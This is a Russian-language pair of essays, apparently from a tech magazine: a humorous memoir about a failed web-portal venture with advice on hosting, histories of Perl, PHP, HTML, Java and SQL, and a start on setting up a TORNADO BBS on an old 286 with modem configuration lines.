Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38

Худая грамота только душе пагуба.

(интернет мечтателям посвящается)
Увы, мой стих не блещет новизной,
Разнообразьем перемен нежданных.
Не поискать ли мне тропы иной,
Приёмов новых, сочетаний странных?
(В.Шекспир)
Вызывает ли у вас раздражение слово портал? У людей не сведущих оно, конечно, не будет резать слух, и воскрешать разнообразные эмоции. В лучшем случае они вспомнят игру War craft 2 или интернет сайт со стандартным силиконовым видом, форумом PHPBB и каким ни будь аномальным чатом. Может ещё в воображении нарисуется on-line газета увешанная баннерами, как новогодняя ёлка? В которой, как всегда очень много мусора и очень мало полезных вещей… Как это до боли знакомо. Не так ли, дорогой читатель? И после этого ты каждый раз сам себе говоришь: “Да я смог бы сделать лучше, мой портал мог быть самым посещаемым!” И после этого вновь и вновь в белорусском сегменте сети появляются ресурсы похожие друг на друга, как клоны Norton Commander. И уже другой пользователь наткнувшись в поисковике на этот портал, скрипя зубами нажимает алт+ф4. Потому что в очередной раз он нашёл то, чего как раз и не искал.
1.Рожки да ножки.
Вот и я, дорогой читатель, загорелся этой благородной идеей создания портала, где будет всё, но нет ничего нового. Зависая однажды в одном благородном чате, мне удалось познакомился с неким человеком под ником Маршал78. Он представился создателем и автором портала, который через несколько дней, месяцев или лет должен был открыться. Это произвело на меня неизгладимое впечатление, ведь я по правде считал, что создатели коммерческих проектов в сети люди серьёзные, очень продвинутые и коммуникабельные. Маршал78 недолго думая, предложил мне встретится и договорится о совместной работе над проектом. В тот период у меня уже имелся кое-какой опыт общения с подобным контингентом. Мне удалось несколько раз опубликовать свои работы в газете “Калифорнийский Вестник”. Мозг сам по себе рисовал картинку человека с красивой распальцовкой и золотой цепью на килограмм. Потому что я не мог представить себе то, чтобы обычный простой смертный начал делать, вы только подумайте, свой собственный портал. От этой мысли даже начинало немного штормить в голове. Но вот долгожданный день встречи с Маршалом78 наступил. Стрелка, а по-другому и не скажешь, была назначена возле “Академии наук РБ”, видимо, это должно было прибавить респектабельности. Хотя сейчас глядя назад в прошлое, она больше напоминала встречу двух агентов спецслужб во вражеской стране. Кодом служили усы и организатор. Я долго ползал в переходе, ища правильный выход к зданию академии. Погода стояла ненастная. Небо было затянуто серыми тучами, дул пронизывающий ветер. В переходе прошло два человека, они быстро промелькнули возле меня. Голова выработала новую мысль и позволила выйти из перехода. Возле здания “Академии наук РБ” стояло два человека. Они ругались замудреными словами. Я подошёл представился и попытался включиться в разговор. Но слышал только непонятные для себя реплики. Так мы простояли некоторое время, пока не подошёл ещё один создатель проекта. Как это не парадоксально мы пошли искать кафе, в котором мы сможем посидеть. Маршала78 всё не устраивали цены. То дорого, то ещё дороже. Так мы бродили, пока не зашли в студенческую столовую. Там цены оказались приемлемыми. Здесь мы сели и началось. На мою голову обрушились новые компьютерные термины: хостинг, php, perl, mysql, mssql, asp и многое другое. Один из пришедших божился и клялся, что ему написать форум и чат для портала MyBasnya.net не составит никакого труда. Второй бил себя в грудь и кричал, держа в руках стакан с пивом, что он сможет обеспечить информацией всё вдоль и поперёк. Мне приходилось молчать, попивая чай, следуя народной мудрости “молчи за умного сойдёшь”. В момент на столе выросла груда бумаги со схемами, идеями, набросками. Я был просто в шоке от такого, на мой взгляд, хакерского отношения. Маршал78 был не то что проникнут идеей его полного будущего превосходства в сети, но и называл месячный оборот в 150 000$. От чего мне стало совсем дурно. Съезд закончился спустя три часа. И я загруженный поехал домой. Прошло несколько месяцев, те кто приезжал на встречу отказались от проекта. Я и Маршал78 остались без программистов. Собственно говоря, время прошло, а портала и не было. MyBasnya.net продолжал висеть в воздухе, как воздушный шар. Маршал78 напоминал Наполеона в своём стремлении достичь чего-то. Он создавал один дизайн, за другим и никак не мог определится, что же он хочет видеть на портале. А хотел он многого. За это время он достал все конторы и фирмы Минска своим предложением о сотрудничестве. Но везде ему давали ответ: “Сделаешь, тогда и будем говорить.” Время шло, толку было мало. Маршал78 собрал новую встречу и нашёл новых программистов. По 16 и 17 лет соответственно. Это меня ввергло в недоумение, но я промолчал. Надо значит надо. К тому времени мне удалось уже пробиться в издание “Персонально для вас Калифорнийцы”. И у Маршала78 созрел новый план. Он решил сделать ON-LINE газету. Маршал78 искренне полагал, что у него всё получится без проблем. План был очень прост, своей информативностью и гениальностью задушить все компьютерные СМИ республики. “Мама, дорогая. Да он просто гений!” – подумал я. И конечно согласился. Но новые программисты были людьми ограниченными, и вместо дохода в 150 000$ их интересовал банальный чат для подростков, который Маршал78 повесил у себя. Они глотали слюни и хотели только одного – стать модераторами. “Боже мой, с кем он связался?” – подумал я и бросил MyBasnya.net, перед этим снявшись по телевидению вместе с создателями портала в одной из компьютерных передач. С того весёлого времени ничего не поменялось. Портал MyBasnya.net находится в полусонном состоянии, вот уже два года. Программисты ушли и организовали свой чат с помощью чужих исходников выданных за свои. Маршал78 старается изо всех сил. А я решил подойти к созданию портала со своей, более прагматичной точки зрения.
2.Идея и хостинг созданы друг для друга.
Рассуждая сам с собой о выбранном нами с Маршалом78 пути создания портала, я открыл для себя две непреложные истины. Они заключались в идеи уникальности и независимости от чего или кого-либо. Как можно создавать серьёзный проект, если каждый занимается всем и не чем? И первое, что оказалось нужно это команда, которая займётся хоть чем-то. Второе это идея и концепция портала. Не имею привычки раскрывать свои карты, выскажу лишь мнение, что заняться нужно тем, чего ещё нигде нет. Условно назовём идею проекта “Любители хачипури”. Вы знаете, что это такое? Вы когда-нибудь ели хачипури? Ели! То-то же. В этом и есть самая соль. Хачипури есть, чай есть, а портала про это нет. Нет форума хачипури, чата хачипури, рассылки хачипури. И следовательно условный контингент любителей этого блюда в сети испытывает огромные психологические проблемы. Конечно же, из-за отсутствия соответственного портала. Вы скажите: “Что за бред ты пишешь?” Поясню. Сколько сайтов посвящённых компьютерной тематике? Много? Не то слово. Их сотни если не тысячи, тех кто называет себя порталом. И если вы откроете такой ресурс, на вас не обратят внимания или скажут о том, что вы ещё один из многих. И это жестокая правда жизни. А вот если вы у себя будете рассказывать про хачипури, каждый, даже если таких ресурсов станет много, скажет о том, что именно у вас здесь родилась великая идея. Для престижа найдите ещё и людей, которые смогут вести свои рубрики, тех кому будет просто интересно. Пусть это будет и один человек, но он будет окрылён вашей идеей. Затем мы посмотрим вокруг и поймём, что везде и всё дышит однообразием. Я уже писал выше про тот же PHPBB форум, тот же PERL чат для подростков с кучей смайликов. Скучно…. Но за то у вас будет хачипури! Оно выведет портал из стандартного силиконового однообразия. И поймите, если вам начнут выказывать своё недовольство, знайте о том, что вас заметили. Дело сделано! Проблема теперь в другом. Как заработать? Дело ваше я и Маршал78 в этом вам не советчики. Поэтому остерегайтесь моих ошибок.
Это было лирическое отступление. Ну а теперь серьёзно. Самая большая проблема у всех начинающих порталов состоит в выборе местопребывания или проще говоря хостинга.
Что же такое хостинг? Хостинг — это выделяемый пользователю на сервере (компьютере, постоянно подключенном к сети) раздел на диске в виде каталога, в котором хранится вся информация вашего сайта. Всё от графики до скриптов. Хостинг бывает платный и бесплатный (условно). О платном рассказывать бессмысленно, ведь там и так всё понятно. А вот с бесплатным хостингом бывает много проблем. Обычно там живёт куча рекламы, которую размещают, дабы оплатить свои безвозмездные услуги и ещё заработать. Это могут быть баннеры, текстовые ссылки, рекламные фреймы, всплывающие окна и тому подобное. Всегда существует ограничение на закачку файлов. Но самое главное не это. На бесплатном хостинге нельзя заниматься коммерческой деятельностью, а следовательно он больше подходит для домашних страниц, либо сайтов жадных компьютерных фирм.
Так что если вы жадная не компьютерная фирма и не домашняя страничка Билла Крокодила, то я рискну вам предложить методы выбора хостинга. И первое на что мы посмотрим это на предоставляемое нам дисковое место. Итак, разлёт цен и места поистине огромен. Заграничные компании могут предложить и 500 мегабайт всего за 15 долларов в месяц. Наши же товарищи более скупые. Так как они чаще всего бывают
субхостерами, то есть проще говоря перепродают услуги капиталистических компаний. Одним словом спекулянты. Поэтому первое правило, возникшее само собой в процессе рассуждения, скажет нам, что хостинг нужно покупать у самих компаний, а не у посредников. Ну а если дело идёт уже на принцип, то есть у вас аудитория только с СНГ или наоборот только из НАТО, то тогда нам следует решить, нужна ли вам русская служба поддержки, которую можно доставать целыми днями или лучше сэкономить пару другую американских денег. Решать вам. И вот после того как найден приемлемый вариант по цене, нужно будет выяснить, что же может предоставить хостер. Важный фактор это дополнительные возможности: собственная cgi-bin директория, где можно запускать свои скрипты, поддержка Perl, Php, SSI, баз данных. Новичкам, возможно, эти сервисы и не к чему, но поверьте, что без них вы никогда не сделаете интерактивный сайт с форумами, гостевыми книгами, поисками и прочими полезными наработками. Не лишним будет спросить у хостера, возможна ли прямая закачка с вашей матрицы или другого накопителя на сервер. Ведь многие до сих пор пользуются dial up и закачивать собственный сайт будет очень тяжело. И ещё, если же вы решили покупать платный хостинг, то обязательно просите тестовый аккаунт на 3-7 дней, чтобы проверить сервис или ищите в правилах строчку о возвращении денег в течение 30 дней, если вас что-то не устраивает. Обязательно заключайте договор, чтобы на крайний случай был юридически оформленный документ. Есть ещё одна тонкость у платных хостингов. Читая правила и тарифы, следует внимательно вникать во все, что касается затрат. Нужно убедиться, что не будет скрытых платежей. Кроме тех что сразу заплатите. Потому, как некоторые хитроумные товарищи любят за все взимать денежки. Например, помимо обычной помесячной оплаты с вас могут взять вначале некую сумму 20-50 условных единиц за установку и настройку вашего аккаунта. Ведь они трудятся дни и ночи на благо пользователей, а вы должны это оценить. Кроме того, могут быть платными услуги парковки и поддержки ваших доменов 2-го и 3-го уровня, дополнительно могут стоить e-mail, субдомены, открытия баз данных. Могут так же взиматься дополнительные деньги за перерасход трафика. Последнее, кстати, обычно оправданно, ибо есть разница, если вы содержите страничку с посещаемостью 100 человек в день или очень посещаемый портал, обозреваемый десятками тысяч пользователей ежедневно. Немаловажное значение имеет служба поддержки, которая в идеале должна оперативно в течение нескольких часов после запроса отвечать на ваши вопросы и давать консультации, исправлять ошибки и улаживать прочие мелочи, возникающие в процессе пользования серверов. Ради интереса можно позвонить или задать администратору какой-нибудь каверзный вопрос, чтобы посмотреть его реакцию и работоспособность. Конечно, претендовать на истину в вопросе выбора хостинга я не могу. Каждый должен решать сам, что ему нужно, а что нет.
3. Вспомним всё?
Когда мы с Маршалом78 делали свой портал, мы так и не знали, чем же исторически Perl отличался от Php. Да, если бы и захотели узнать, нам бы это не понадобилось. Ведь создатели порталов люди продвинутые, и нагружать себя разной полезной информацией они не должны. Тем более, когда они ещё настраивают PHPBB форум. Каждый раз когда мы встречались и обсуждали работу, мы невольно упоминали разные термины, связанные с хостингом. И бывало, так что вновь пришедшим была непонятна тема нашей беседа или очень скучна. Потому всякий раз произнося фразы по PHP, PERL, SQL каждый задавался вопросом: “Что это такое?” Хотя меня всегда терзала другая проблема: “Зачем это нужно?” Скажите, для чего был изначально разработан PERL, PHP, HTML или ещё что-то? И вновь мы натыкаемся на стену из вопросов. Так может её проломать?
PERL — Practical Extraction and Report Language практический язык извлечений и отчетов.
Perl был разработан Ларри Уоллом (Larry Wall) в 1986 году, когда он являлся системным администратором одного проекта UNIX, связанного с созданием безопасной многоуровневой сети. Работа была выполнена, но потребовалось создание отчетов на основе большого числа файлов с многочисленными перекрестными ссылками между ними. Первоначально Ларри предполагал использовать для этих целей фильтр awk, но оказалось, что последний не мог управлять открытием и закрытием большого числа файлов на основе содержащейся в них же самих информации о расположении файлов. Его первой мыслью было написать специальную системную утилиту, решающую поставленную задачу. Но вспомнив, что до этого ему уже пришлось написать несколько утилит для решения задач, не «берущихся» стандартными средствами UNIX, он принял кардинальное решение — разработать язык программирования, который сочетал бы в себе возможности обработки текстовых файлов (sed), генерации отчетов (awk), решения системных задач (shell) и низкоуровневое программирование. Результатом этого решения и явился язык Perl, интерпретатор для которого был написан на С.
По утверждению самого Ларри Уолла при создании языка Perl им двигала лень — не в прямом смысле, а в смысле того, что для решения стоявшей перед ним задачи следовало бы написать большое количество программ на разных языках, входящих в состав инструментальных средств UNIX, а это достаточно утомительное занятие. Новый язык программирования сочетал в себе возможности системного администрирования и обработки файлов — две основные задачи, решаемые обычно при программировании в системе UNIX. Причем следует отметить, что язык Perl появился из практических соображений, а не из-за желания создать еще одно «красивое» средство для работы в UNIX, поэтому-то он и получил широкое распространение среди системных администраторов. Когда Ларри Уолл предоставил его широкому кругу пользователей. С появлением языка Perl стало возможно решать задачи с помощью одного инструмента, и не тратить время на изучение нескольких языков среды программирования UNIX. Первая версия языка имела возможности:
— простой поиск по строковым образцам (шаблонам) в файлах;
— дескрипторы файлов;
— скалярные переменные;
— форматы.
Вся документация умещалась на 15 страницах, но Perl решал задачи быстрее, чем sed или awk, и быстро стал использоваться не только для решения задач системного администрирования. В дальнейшем сам Ларри Уолл позаимствовал у Генри Спенсера (Henry Spencer) пакет для работы с регулярными выражениями и модифицировал его для языка Perl. Другие функциональные возможности были разработаны не только Ларри Уоллом, но и его друзьями и коллегами, и включены в состав языка. Опубликование в Internet привело к появлению сообщества единомышленников, которые не только эксплуатировали, но и развивали язык. Он и по настоящее время продолжает интенсивно развиваться за счет разработки пакетов, реализующих новые применения языка к развивающимся информационным технологиям.
PHP/FI — personal Contents Page / Forms Interpreter.
Php появился как развитие другого продукта, PHP/FI. PHP/FI был создан Rasmus’ом Lerdorf’ом в 1995 году, сначала как простой набор Perl-скриптов для отслеживания доступа к его собственному online-резюме. Он назвал этот набор скриптов “Personal Contents Page Tools”. Поскольку требовалось большая функциональность, Rasmus написал расширенную реализацию C, которая могла работать с базами данных, и дал пользователям возможность разрабатывать простые динамические Web-приложения. Rasmus решил опубликовать исходный код PHP/FI для широкого доступа, чтобы любой мог использовать, расширять и улучшать его. PHP/FI, имел некоторую основную функциональность того PHP, который известен нам теперь. Он имел Perl-подобные переменные, автоматическую интерпретацию переменных форм и синтаксис, внедрённый в HTML. Сам по себе синтаксис напоминал Perl, хотя и более ограниченный, упрощённый и неполный. В 1997 году PHP/FI 2.0 имел несколько тысяч поклонников по всему миру, приблизительно 50,000 доменов, на которых он был установлен. Что составляло примерно 1% всех доменов Internet. Поскольку множество людей предоставляли блоки кода для этого проекта, он перестал быть проектом одного человека. PHP/FI 2.0 был официально выпущен только в ноябре 1997 года, после того как просуществовал в основном в виде beta-релизов. Вскоре после этого появились первые alphа PHP 3.0. PHP 3.0 был первой версией, похожей на сегодняшний PHP. Его создали Andi Gutmans и Zeev Suraski в 1997 году как полностью переписанный язык. Поскольку они считали PHP/FI 2.0 недостаточно мощным для разработки их собственных коммерческих приложений. С целью кооперации усилий, Andi, Rasmus и Zeev создали и выпустили PHP 3.0 как официальный преемник PHP/FI 2.0. Одной из сильных сторон PHP 3.0 была возможность его расширения. Кроме того, предоставляя конечным пользователям прочную инфраструктуру для различных БД, протоколы и APIs, возможности расширения PHP 3.0 побуждали десятки разработчиков поставлять новые модули расширения. Возможно, именно в этом был секрет ошеломляющего успеха PHP 3.0. В конце 1998 года PHP стал базой для десятков тысяч пользователей и сотен тысяч Web-сайтов. В момент пика своего успеха PHP 3.0 был установлен приблизительно на 10% Web-серверов Internet. PHP 3.0 был официально выпущен в июне 1998 года после 9 месяцев публичного тестирования. Andi Gutmans и Zeev Suraski начали переработку ядра PHP с целью повысить производительность при работе сложных приложений и улучшить модульность кодовой базы PHP. Такие приложения были возможны в PHP 3.0, но он не разрабатывался для эффективного обслуживания сложных комплексных приложений. Новая машина, ‘Zend Engine’ (по именам создателей — Zeev и Andi), успешно решила эти задачи. И появилась сначала в середине 1999 года. PHP 4.0, основанный на этой машине и оснащённый большим количеством новых возможностей, был официально выпущен в мае 2000 года, спустя почти два года после своего предшественника, PHP 3.0. Помимо значительно возросшей производительности в этой новой версии, PHP 4.0 ввёл такие новые ключевые возможности, как поддержка большого количества Web-серверов, HTTP-сессий, буферизации вывода, более безопасные способы работы с пользовательским вводом. HTML – Hyper Text Markup Language, язык разметки гипертекста.
Начало истории HTML следует отнести к далекому 1986 году, когда международная организация по стандартизации ISO приняла стандарт ISO-8879, озаглавленный «Standard Generalized Markup Language (SGML)». Стандарт этот посвящен описанию SGML — обобщенного метаязыка, позволяющего строить системы логической, структурной разметки любых разновидностей текстов. Создатели SGML стремились максимально абстрагироваться от проблем представления электронного текста в разных программах, на разных компьютерных платформах и устройствах вывода. Так, если с помощью SGML размечается документ, содержащий заголовки, идеология языка запрещает указывать, что такой-то заголовок должен набираться, скажем, шрифтом Times полужирного начертания. SGML в таком случае требует ограничиться указанием на уровень заголовка и его место в иерархической структуре документа. Язык SGML — это типичное детище академической науки, изящная игрушка теоретиков. Его создание не было вызвано насущной практической необходимостью. Принципы, на которых строится этот язык, значительны и интересны; несомненно, идеология SGML оказала влияние на многие компьютерные разработки. Однако сам по себе SGML не получил сколько-нибудь заметного распространения — до тех пор, пока в 1991 г. сотрудники Европейского института физики частиц (CERN), занятые созданием системы передачи гипертекстовой информации через Интернет, не выбрали SGML в качестве основы для нового языка разметки гипертекстовых документов. Этот язык — самое известное из приложений SGML — был назван HTML. Изначально HTML, как и положено SGML-приложению, разделял все особенности старой идеологии. Из сорока с небольшим тегов HTML версии 1.2 (июнь 1993 года) всего три, да к тому же и не рекомендованных к использованию, осмеливались намекать на физические параметры представления документа. Вся разметка была чисто логической. Первым графическим броузером в те далекие времена была программа Mosaic, разработанная, как и сам WWW, в научном учреждении — Национальном центре суперкомпьютерных приложений США (National Center for Supercomputer Applications — NCSA). HTML неторопливо развивался, оставаясь в рамках парадигмы структурной разметки, и в апреле 1994 года началась подготовка спецификации следующей версии языка — 2.0. Этим занимался образованный в том же году Консорциум W3, унаследовавший от CERN верховную власть и авторитет в мире WWW. Однако в 1994-1995 гг. его членами были почти исключительно университеты и научные учреждения. Столь «академический» состав W3C сказывался как на самих документах, публикуемых консорциумом, так и на процедуре их принятия. Достаточно сказать, что окончательный вариант HTML 2.0, единственным серьезным усовершенствованием в котором был механизм форм для отсылки информации с компьютера пользователя на сервер, был окончательно утвержден лишь в сентябре 1995 года, когда в W3C уже полным ходом шло обсуждение HTML 3. Пожалуй, этот проект самая яркая и неоднозначная страница в истории языка. Работа над ним началась в марте 1995 года и первоначальный вариант стандарта включал в себя много интересных нововведений. Теги для создания таблиц, разметки математических формул, вставки обтекаемых текстом рисунков, примечаний и другое. Но самое главное — HTML 3.0 был попыткой разрешить уже достаточно очевидное к тому времени противоречие между идеологией структурной разметки и потребностями пользователей, заинтересованных в первую очередь в гибких и богатых возможностях визуального представления. Чтобы разрешить это противоречие, не оскверняя заветов отцов-основателей HTML, авторы версии 3 ввели в ней поддержку нового средства иерархических стилевых спецификаций (Cascading Style Sheets, CSS). Система CSS формально независима от HTML, имеет совершенно иной синтаксис не наследует никаких идеологических ограничений и позволяет, уже в совершенно иных терминах, задавать параметры визуального представления для любого тега HTML. С помощью CSS автор может наконец с чистой совестью указать, каким шрифтом набирать заголовки такого-то уровня. В конце 1995 года ситуация в мире HTML была довольно смутной. Популярность броузера Netscape неуклонно росла, программисты этой фирмы готовили к выпуску версию 2.0, которая должна была утвердить господство Netscape на вечные времена благодаря неслыханному набору новшеств. К этому времени W3C окончательно завяз в своем проекте HTML 3. Он был слишком сильно оторван от реального мира и на завершение, которого у консорциума попросту не хватало средств. Язык по сравнению с HTML 2.0 был важным шагом вперед, однако он развивался по-прежнему в рамках идеологии структурной разметки, а инструмент, дающий возможность выйти за эти рамки, система CSS была еще далека от завершения. В этот тяжёлый момент в игру вступил новый участник — неугомонная корпорация Microsoft. Долгое время эта компания, привыкшая монопольно владеть своим сектором рынка, недооценивала перспективы Интернета и не собиралась как-либо участвовать в развитии этой информационной среды, считая ее, по-видимому, слишком демократичной и непредсказуемой. Однако невероятный взлет Netscape (число копий броузера Navigator измерялось к этому времени уже десятками миллионов) заставил Microsoft изменить мнение. И именно на броузерном фронте, где господство Netscape оставляло меньше всего шансов конкурентам, корпорация Microsoft нанесла свой главный удар. Поначалу мало кто верил, что броузер Microsoft Internet Explorer, который тогда существовал в версии 2.0 и не представлял собой ничего выдающегося, сможет составить конкуренцию Netscape. Тем не менее, выпущенная летом 1996 г. версия Internet Explorer 3.0, которая поддерживала почти все расширения Netscape и обладала оригинальным и привлекательным интерфейсом, вызвала настоящий бум и очень быстро утвердилась в качестве «второго главного броузера». Сейчас Microsoft и Netscape делят рынок броузеров почти поровну, и окончательный исход их битвы не берется предсказать никто.
JAVA.
Язык Java зародился как часть проекта создания передового программного обеспечения для различных бытовых приборов. Реализация проекта была начата на языке С++, но вскоре возник ряд проблем, наилучшим средством борьбы с которыми было изменение самого инструмента — языка программирования. Стало очевидным, что необходим независимый язык программирования, позволяющий создавать программы, которые не приходилось бы компилировать отдельно для каждой архитектуры. Рождению языка Java предшествовала довольно интересная история. В 1990 году разработчик ПО компании Sun Microsystems Патрик Нотон (Patrick Naughton) понял, что ему надоело поддерживать сотни различных интерфейсов программ, используемых в компании, и сообщил исполнительному директору Sun Microsystems и своему другу Скотту МакНили (Scott McNealy) о своем намерении перейти работать в компанию NeXT. МакНили, в свою очередь, попросил Нотона составить список причин своего недовольства и выдвинуть такое решение проблем, как если бы он был Богом и мог исполнить все, что угодно.
Нотон, хотя и не рассчитывал на то, что кто-то обратит внимание на его письмо, все же изложил свои претензии, беспощадно раскритиковав недостатки Sun Microsystems, в частности, разрабатываемую в тот момент архитектуру ПО NeWS. К удивлению Нотона, его письмо возымело успех: оно было разослано всем ведущим инженерам Sun Microsystems, которые не замедлили откликнуться и высказать горячую поддержку своему коллеге и одобрение его взглядов на ситуацию в Sun Microsystems. Обращение вызвало одобрение и у высшего руководства компании, а именно, у Билла Джоя (Bill Joy), основателя Sun Microsystems, и Джеймса Гослинга (James Gosling), начальника Нотона.
В тот день, когда Нотон должен был уйти из компании, было принято решение о создании команды ведущих разработчиков с тем, чтобы они делали что угодно, но создали нечто необыкновенное. Команда из шести человек, с кодовым названием Green, ушла в самовольное изгнание, погрузившись в исследования бытовых устройств, таких как Nintendo, Game Boys, устройств дистанционного управления. Команда Green пыталась найти средство, с помощью которого можно было бы установить взаимодействие между этими устройствами. Вскоре стало ясно, что такие электроприборы, как видеомагнитофоны, проигрыватели лазерных дисков, стереосистемы были реализованы на разных процессорах. Это означало, что если производитель захочет добавить телевизору или видеомагнитофону дополнительные функции или характеристики, он будет зажат в рамках средств, зашитых в аппаратное обеспечение. Эта проблема, в сочетании с ограниченностью памяти микросхем этих устройств, выдвинула новый подход к программированию, который должен был стать ведущим на рынке бытовой электроники. Команда приступила к разработке нового объектно-ориентированного языка программирования, который был назван Oak (дуб), в честь дерева, росшего под окном Гослинга. Вскоре компания Sun Microsystems преобразовала команду Green в компанию First Person. Новая компания обладала интереснейшей концепцией, но не могла найти ей подходящего применения. После ряда неудач неожиданно ситуация для компании резко изменилась. Был анонсирован Mosaic — так родился World Wide Web, с которого началось бурное развитие Internet. Нотон предложил использовать Oak в создании Internet- приложений. Так Oak стал самостоятельным продуктом, вскоре был написан Oak-компилятор и Oak-браузер «WebRunner». В 1995 году компания Sun Microsystems приняла решение объявить о новом продукте, переименовав его в Java. Когда Java оказалась в руках Internet, стало необходимым запускать Java-аплеты — небольшие программы, загружаемые через Internet. WebRunner был переименован в HotJava, а компания Netscape встала на поддержку Java-продуктов.
SQL Structured Query Language, язык структурированных запросов.
Этот язык предназначен для создания и работы с реляционными базами данных (relational database), которые представляют собой наборы связанных данных, хранящихся в таблицах. Для управления с реляционными базами данных используются программы, называемые системами управления базами данных, СУБД (database management systems, DBMS). На рынке предлагается большое разнообразие таких программ: DB2 Universal Database, Oracle, Microsoft SQL Server, Microsoft Access, Sybase Adaptive Server Enterprise, SQL Anywhere Studio, Informix Information Server, Ingres, MySQL, mSQL и другие. Для выполнения операций с базами данных эти СУБД используют SQL. Благодаря своей элегантности и машинной независимости, а также поддержке промышленными лидерами в технологии реляционных баз данных, SQL был признан стандартным языком и в обозримом будущем сохранит свои позиции. Стандарт SQL является совместной разработкой ANSI (American National Standards Institute) и ISO (International Organization for Standardization). С 1986г. эти организации опубликовали серию стандартов SQL, каждый последующий из которых является объединением предыдущих. Эти стандарты имеют тенденцию опережать развитие компьютерной индустрии на несколько лет. В 2000 году большинство коммерческих продуктов соответствовало стандарту SQL92. Даже сейчас еще не все элементы этого стандарта широко реализованы. Впрочем, многие коммерческие СУБД расширяют SQL за рамки определений ISO, добавляя полезные возможности. В любой из версий, отклонение от стандарта должны описываться в документации на программный продукт.
И всё было бы у нас хорошо с Маршалом78, если бы слишком много не говорили о создании портала, при минимуме знаний о работе в веб. О каком можно было говорить платном хостинге, когда я толком не знал как настроить веб сервер? Чувствую, читатель уже почёсывает свои компьютерные руки, дабы мне написать письмо. APACHE ставить нужно было! А я с этим не согласен. Проследите мою логику. Большинство пользователей работают с WINDOWS. Так зачем им устанавливать UNIX программу, с жуткой консолью, которая только может напугать пользователя? Хотя уже имеется отличная графическая надстройка её по-прежнему нужно настраивать. А мне ленивому WINDOWS юзеру это нужно? Конечно, нет. Под любимые или ненавистные, кому как, окна существует множество веб серверов. Но почему-то все упорно ставят APACHE.
Список популярных WINDOWS серверов: Falcon Web Server www.blueface.com . Сокол, а именно так переводится его название. Веб сервер способен работать на небольшом сайте, с посещаемостью 50-80 загрузок за минуту. Программа умеет выполнять ISAPI и приложения WinCGI в виртуальных директориях. Сервер Falcon разрабатывался так, чтобы быть по возможности совместимым с IIS. Следовательно, вы, как разработчик, можете разрабатывать и тестировать свои скрипты в Falcon, а затем развертывать их в любое время без модификаций. Local web http://www.intranet-server.co.uk/ . Простой приятный веб сервер, который поддерживает perl. Имеет вполне доходчивый графический интерфейс. Все настройки производятся буквально парой кликов мышки. Omni httpd http://www.omnicron.ca Так же как и все win сервера имеет очень приятный вид и простой интерфейс. Поддерживает работу как с php, так и с perl. Считаю его наиболее удачной программой для домашних условий. Единственное “НО” которое может возникнуть у вас при работе с вышеописанными утилитами это регистрация. Но как говорят: “Где наша не пропадало?” По окончанию публикации мне остаётся лишь тяжело вздохнуть по поводу Маршала78 и его портала. Ещё раз хочется вспомнить те хорошие времена, когда я не знал ничего, но хотел очень многого. Ведь прав был Шекспир?
Как часто эти найденные строки
Для нас таят бесценные уроки.

При написании публикации была использована информация следующих сайтов:
http://dimexio.hoha.ru, http://sql.itsoft.ru, http://www.codenet.ru, http://z3950.uiggm.nsc.ru, http://www.weberam.ru, материал Дмитрия Кирсанова http://www.kirsanov.com.

Роман Карпач

Возрождение BBS в лучших традициях.

1. Восход или закат?

Как не прискорбно, но на данном этапе своей истории BBS (Bulletin Board System – электронные доски объявлений) являют собой довольно жалкое зрелище. На мой взгляд, не потому что они устарели, а просто из-за того что никто их не продвигает в массы, как например, всевозможные сайты в сети internet. А ведь идея BBS действительно замечательная! Для тех, кто не понимает о чём идёт речь, я расскажу подробнее. Биба, как ласково называют BBS, это такая программа (tornado, delta, max), которая позволяет с использованием одного модема и одного телефона общаться, обмениваться файлами десяткам людей. Как же это происходит? Довольно просто. Скажем так, по очереди. В начале звонит один человек и оставляет своё послание в форуме, затем звонит другой и отвечает. То же и с файлами. Их может закачивать как СисОп (системный оператор – начальник BBS), так и пользователи станции. Тем самым, обмениваясь между собой всевозможными, занимательными вещами. Этот принцип действия называется “ЭХО”. Надеюсь, всем легко понять почему.
Споры вокруг полезности или бесполезности BBS не затихают не миг. Кто-то считает это прошлым, а кто-то альтернативой в будущем. Но мы сегодня не будем решать кто прав, а кто виноват. Проще будет написать, про всё как есть. А читатель пусть сам и решает.

2. Зачем тебе это нужно?

“Зачем тебе это нужно?” – спросили меня, когда только начиналась работа по созданию BBS. “Для друзей” – ответил я и посчитал, что этим всё сказано.
Всем известна проблема старых компьютеров AT или XT. И выкинуть жаль, и для работы уже не пригоден. Вот здесь и появляется большое поле для действий. Чтобы мой старый конь не пылился в шкафу, решено было сделать из него новую BBS станцию. IBM 286-12mhz/4 mb ram/170 hdd и конечно же модем на 33600 (COM2) для Бибы подходят как нельзя лучше. Сразу оговорюсь, что старые СисОпы, всегда считают своим долгом высказать сомнение в работе станции под MS DOS. Почему- то, всех их сразу тянет в далёкие дебри OS/2. Ну да, фидошный бог с ними!
После долгих мучений, которые были испытаны при поиске подходящего программного пакета BBS, было обнаружено всего три достойные программы. Они назывались: MAX, DELTA5, TORNADO BBS. После длительного изучения был сделан вывод, что для компьютера на базе 286-го процессора больше всего подойдёт TORNADO. Так как данный продукт является русскоязычным по своей сущности и просто настраиваемым по идеи. Отмечу то, что программы для работы с BBS можно скачать с сайта http://www.fdd5-25.net. Там же находится fossil драйвер необходимый для работы с портом, а следовательно и с модемом. Без него станция будет работать только в локальном режиме. После всех приготовлений следует перейти к установке TORNADO. Она довольно простая и следовательно этот процесс в описании не нуждается. То ли сама настройка программы! Здесь придётся помучаться. После того как программа установлена в каталог. У меня это C:\TORNADO\. Нам сразу же следует заглянуть в файл tornado.ctl – главный файл BBS. Здесь мы обнаружим множество параметров. Все они описаны на русском языке. Что это делает работу на много проще. И первые строчки на которых заострим внимание будут:

HardWare_Flow Yes ; Понимает ли модем (и настроен ли он со-
; ответствующим образом) управление пото-
; ком данных по сигналам RTS/CTS (по
; умолчанию Yes).
SoftWare_Flow Yes ; Понимает ли модем (и настроен ли он со-
; ответствующим образом) управление пото-
; ком данных по XON/XOFF (по умолчанию
; Yes).

Для того чтобы данные параметры работали в строке инициализации модема файла tornado.ctl пропишем.
InitString ATZ| AT/Q3| AT/N5| ATC0|, где ATC0 являет собой поддержку сжатия данных 0 выключено, а 1 включено. Если же у вас софт модем, то тогда следует убрать аппаратную поддержку HardWare_Flow No. В строчке BaudRate укажем скорость модема. У меня это 33600. Остальные настройки модема оставим без изменений. Начинающим пользователям не советуется далее изменять файл tornado.ctl это может вызвать неработоспособность программы!
